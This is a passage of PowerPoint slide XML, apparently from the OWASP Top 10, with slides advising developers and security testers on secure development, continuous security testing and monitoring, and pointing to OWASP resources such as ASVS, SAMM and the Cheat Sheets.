                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>One strategy for determining if you have sufficient monitoring is to examine the logs following penetration testing. The testers’ actions should be recorded sufficiently to understand what damages they may have inflicted.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%. </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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In 2016, identifying a breach took an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>average of 191 days</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – plenty of time for damage to be inflicted.</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18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3168788119"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="81468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578558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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568242">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en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Whether you are new to web application security or already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="sng" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.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900" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2895600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2895600"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2895600"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="2994441"/>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To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>secure</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web application, you must define what secure means for that application. OWASP recommends you use the OWASP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7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)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as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider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8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</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Note</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T</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he annex is for US contract law, so please consult qualified legal advice before using the sample annex. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2932907"/>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 name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4009060"/>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defTabSz="44450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Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start. OWASP recommends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9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets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as a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good starting point for guidance on how to design security in from the beginning. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3942369"/>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Application Security Architecture</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2" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5023678"/>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Building strong and usable security controls is difficult. Using</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a</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set of standard security controls radically simplifies the development of secure applications and APIs.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0"/>
                </a:rPr>
                <a:t>OWASP Proactive Controls</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is a good starting point for developers, and m</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any modern frameworks now come with standard and effective security controls for authorization, validation, CSRF prevention, etc.</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3" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="4962145"/>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Standard Security Controls</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4" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6038296"/>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To improve the process your organization follows when building applications and APIs, OWASP recommends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1"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</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This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5979462"/>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6" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7052915"/>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2"/>
                </a:rPr>
                <a:t>OWASP Education Project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provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try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3"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>WebGoat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4"/>
                </a:rPr>
                <a:t>WebGoat.NET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5"/>
                </a:rPr>
                <a:t>OWASP NodeJS Goat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6"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project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or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7"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project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To stay current, come to an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8"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>AppSec</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8"/>
                </a:rPr>
                <a:t> Conference</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OWASP Conference Training, or local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9"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6996761"/>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Application Security Education</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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5"/>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a:t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19252D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="3119064"/>
            <a:ext cx="1034404" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Application Security Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130051" y="6207001"/>
            <a:ext cx="1073874" cy="466281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure Development Lifecycle</a:t>
            </a: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5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3893361626"/>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5630">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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17770">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="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Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it is supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</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600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="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Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>continuous</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application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</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platzhalter 10"/>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a:t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-876300" y="3124200"/>
            <a:ext cx="8670785" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="219293" y="3150429"/>
            <a:ext cx="6479598" cy="4960107"/>
            <a:chOff x="219293" y="3150429"/>
            <a:chExt cx="6479598" cy="4960107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="3223041"/>
              <a:ext cx="5549303"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Before you start testing, be sure you understand what’s important to spend time on. Priorities come from the threat model, so if you don’t have one, you need to create one before testing.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Consider using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4"/>
                </a:rPr>
                <a:t>OWASP ASVS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and the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5"/>
                </a:rPr>
                <a:t>OWASP Testing Guide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as an input and d</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on’t rely on tool vendors to decide what’s importan</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t for your business. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="95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5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="3150429"/>
              <a:ext cx="930295" cy="891759"/>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endParaRPr lang="en-US" sz="105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 name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="4237660"/>
              <a:ext cx="5549303"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algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Your approach to application security testing must</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be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look for natural opportunities to gather security information and feed it back into your process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="95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9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="4171188"/>
              <a:ext cx="930295"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2" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="5252278"/>
              <a:ext cx="5549303"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Choose the simplest, fastest, most accurate technique to verify each requirement. The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6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework</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and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4"/>
                </a:rPr>
                <a:t>OWASP Application Security Verification Standard</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can be great sources of functional and nonfunctional security requirements in your unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="219293" y="5196300"/>
              <a:ext cx="930295"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Testing Strategies</a:t>
              </a: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4" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="6266896"/>
              <a:ext cx="5549303"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You don’t have to start out testing everything. Focus on what’s important and expand your verification program over time. That means expanding the set of security defenses and risks that are being automatically verified as well as expanding the set of applications and APIs being covered. The goal is to achieve a state where the essential security of all your applications and APIs is verified continuously.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="225522" y="6205362"/>
              <a:ext cx="930295"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rPr>
                <a:t>Achieving Coverage</a:t>
              </a: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 and Accuracy</a:t>
              </a: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6" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="7227295"/>
              <a:ext cx="5549303" cy="852486"/>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algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="950" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
